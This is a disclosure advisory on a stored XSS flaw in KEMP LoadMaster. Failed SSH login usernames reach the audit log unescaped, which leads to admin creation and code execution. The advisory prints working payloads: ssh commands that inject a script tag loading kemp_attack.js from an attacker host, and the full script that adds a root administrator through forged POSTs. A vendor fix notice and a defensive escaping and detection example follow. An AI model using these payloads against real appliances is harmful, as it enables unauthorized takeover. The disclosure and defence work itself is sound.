SSD Advisory – KEMP LoadMaster from XSS Pre Authentication to RCE

Vulnerability Summary
KEMP’s main product, the LoadMaster, is a load balancer built on its own proprietary software platform, LMOS, which lets it run on almost any platform: as a KEMP LoadMaster hardware appliance, as a Virtual LoadMaster (VLM) deployed on Hyper-V or VMware, on bare metal, or in the public cloud. KEMP is available in Azure, where it is among the top 15 deployed applications, as well as in AWS and VMware vCloud Air.
A cross-site scripting vulnerability has been discovered in KEMP LoadMaster v7.135.0.13245 (latest). An unauthenticated user is able to inject their own malicious JavaScript code into the system and use it to create a new web administrator user.
Vendor response
We were unable to get an update beyond this statement from the vendor:
Expect a fix in our new version available Jan 2017.

Vulnerability Details
The issue is located in the System Configuration > System Log Files > View Audit LogFile section (Image 1): the username supplied in a failed SSH login attempt is written to the audit log, and the log page renders that text as HTML without escaping it.

Once administrative access is obtained, the attacker can use it to execute arbitrary code.
Proof of Concept (PoC):
1 – Verify on the victim machine that the Audit LogFile (System Configuration > System Log Files) is empty (Image 2)

2 – Inject simple HTML/JS code into the log page using an SSH client: from the attacker machine, open a shell and type the following:

ssh \<button\ onclick\=alert\(1\)\>Click\<\/button\>@10.0.8.145

3 – Let the login fail by entering a wrong password (Image 4)

4 – Check the log page again (View Audit LogFile): as you can see, the HTML/JS code has been injected (Image 5)

Attack script:
1 – Start a web server on the attack machine and host the following JS file (kemp_attack.js) on it (Image 6)

//BEGIN////////////////////////////////////////////////////////
openl = function(verb, url, data, target) {
  var form = document.createElement("form");
  form.action = url;
  form.method = verb;
  form.target = target || "_self";
  if (data) {
    for (var key in data) {
      var input = document.createElement("textarea");
      input.name = key;
      input.value = typeof data[key] === "object" ? JSON.stringify(data[key]) : data[key];
      form.appendChild(input);
    }
  }
  form.style.display = 'none';
  document.body.appendChild(form);
  form.submit();
};
//modify the target IP (10.0.8.145) and user/pass as necessary
openl('POST', 'https://10.0.8.145/progs/useradmin/add', {user:'Peru',pass:'GoSecure!',s:'Add+User'}, 'newWindow');
//modify the target IP as necessary, xuser must be equal to user. Increase the timeout (250) for debug
setTimeout(function(){openl('POST', 'https://10.0.8.145/progs/useradmin/setopts', {xuser:'Peru',root:'1'}, 'newWindow');}, 250);
//modify the target IP as necessary. The timeout must be greater than the previous
setTimeout(function(){openl('', 'https://10.0.8.145/', '', 'newWindow');}, 500);
//////////////////////////////////////////////////////////END//

2 – Verify the permissions of kemp_attack.js (chmod 644 kemp_attack.js)
3 – Verify the users currently enabled in KEMP LoadMaster under System Configuration > User Management. As you can see, no user (apart from the default one) is active on the appliance (Image 8)

4 – Inject the attack code: from the attacker machine, open a shell and type the following:

ssh \<script \ src\=\"http\&\#x3A\;\/\/10\.0\.8\.130\/kemp\_attack\.js\"\>\</script>@10.0.8.145

5 – Check the log page again (View Audit LogFile): this will activate the script
6 – Check the User Management page again: a new user has been created with all permissions (Image 9)

7 – At this point, as a user with unlimited permissions, you can run any command you wish.

Comments
  • Ramaswamy says:

    XSS Vulnerability with Remote Code Execution
    An XSS vulnerability impacting the KEMP LoadMaster family of products tracked under KEMP reference number PD-8290 allowed non-authenticated users to inject JavaScript code which would allow for the creation of administrative users under certain circumstances. This was resolved in the 7.2.37 version of the LoadMaster Operating System (LMOS), released in February 2017. The resolution addressed an issue that allowed browsers to execute JavaScript from warning logs. The resolution was implemented by having logs sanitized before they are displayed to ensure that scripts are not displayed and are inoperative. This fix was also backported to our 7.1.35 long term support branch. LoadMaster release 7.2.37 and later, as well as the Long-Term Support Release of 7.1.35.2 and later include the fix. In order to mitigate this vulnerability, customers are advised to migrate to one of the aforementioned versions. The latest GA version of LoadMaster and Long-Term Support releases can be accessed at https://support.kemptechnologies.com/hc/en-us/categories/200141477-Downloads. Please contact KEMP Support for any further questions and support with migration related activities by submitting a request at https://support.kemptechnologies.com/hc/en-us/requests/new.
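
The root cause behind the advisory and the fix KEMP describes above is the same one: the username from a failed SSH login is stored in the audit log and the log page renders it as live HTML. The following added example (not KEMP's code and not the advisory's PoC) shows the unsafe rendering next to a hardened version that HTML-escapes every log line before display, which is the sanitisation the vendor comment describes, and a small detector that flags audit-log entries whose username field carries markup. The log-line format, host name and sample lines are constructed assumptions; the real LMOS audit-log format is not shown in the advisory, and the only payloads used are the ones already printed on this page.

```javascript
// Added example, not KEMP's code. Assumed (constructed) audit-log shape:
//   "<date> <host> sshd: Failed password for invalid user <name> from <ip>"
// The username is the attacker-controlled field, exactly as in the advisory's PoC.
const SAMPLE_AUDIT_LOG = [
  "Dec 12 10:01:02 lm sshd: Failed password for invalid user alice from 10.0.8.130",
  "Dec 12 10:03:15 lm sshd: Failed password for invalid user <button onclick=alert(1)>Click</button> from 10.0.8.130",
  'Dec 12 10:05:40 lm sshd: Failed password for invalid user <script src="http://10.0.8.130/kemp_attack.js"></script> from 10.0.8.130',
  "Dec 12 10:07:00 lm sshd: Accepted password for bal from 10.0.8.1",
];

// Vulnerable rendering: log text is concatenated straight into the page, so a
// username containing tags becomes markup the administrator's browser executes.
function renderAuditLogUnsafe(lines) {
  return "<pre>" + lines.join("\n") + "</pre>";
}

// Escape the five characters that can change parsing context in an HTML body
// or attribute value. Entities already present in the log (e.g. &#x3A;) are
// escaped too, so the browser shows them literally instead of decoding them.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: every line is escaped before it enters the page, so the
// same bytes are displayed as text and are inert.
function renderAuditLogSafe(lines) {
  return "<pre>" + lines.map(escapeHtml).join("\n") + "</pre>";
}

// Detection: a failed-login username containing angle brackets or an HTML
// entity is not a plausible account name; it indicates an injection attempt
// against whatever later displays the log.
const FAILED_LOGIN = /Failed password for (?:invalid user )?(.+?) from (\S+)$/;
const MARKUP = /[<>]|&#?\w+;/;

function findInjectedLogEntries(lines) {
  const hits = [];
  for (const line of lines) {
    const m = FAILED_LOGIN.exec(line);
    if (m && MARKUP.test(m[1])) {
      hits.push({ user: m[1], source: m[2], line });
    }
  }
  return hits;
}

// Stand-alone demo: render the constructed log safely and list flagged entries.
console.log(renderAuditLogSafe(SAMPLE_AUDIT_LOG));
console.log(findInjectedLogEntries(SAMPLE_AUDIT_LOG));
```

The detector is intentionally narrow: it only inspects the username field of failed-login records, so it produces alerts on exactly the data path the advisory abuses rather than on every log line that happens to contain a `<`. The escaping function is the minimal output-encoding fix; in a real UI it should be applied at the template layer so that no log field can reach the page unencoded.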
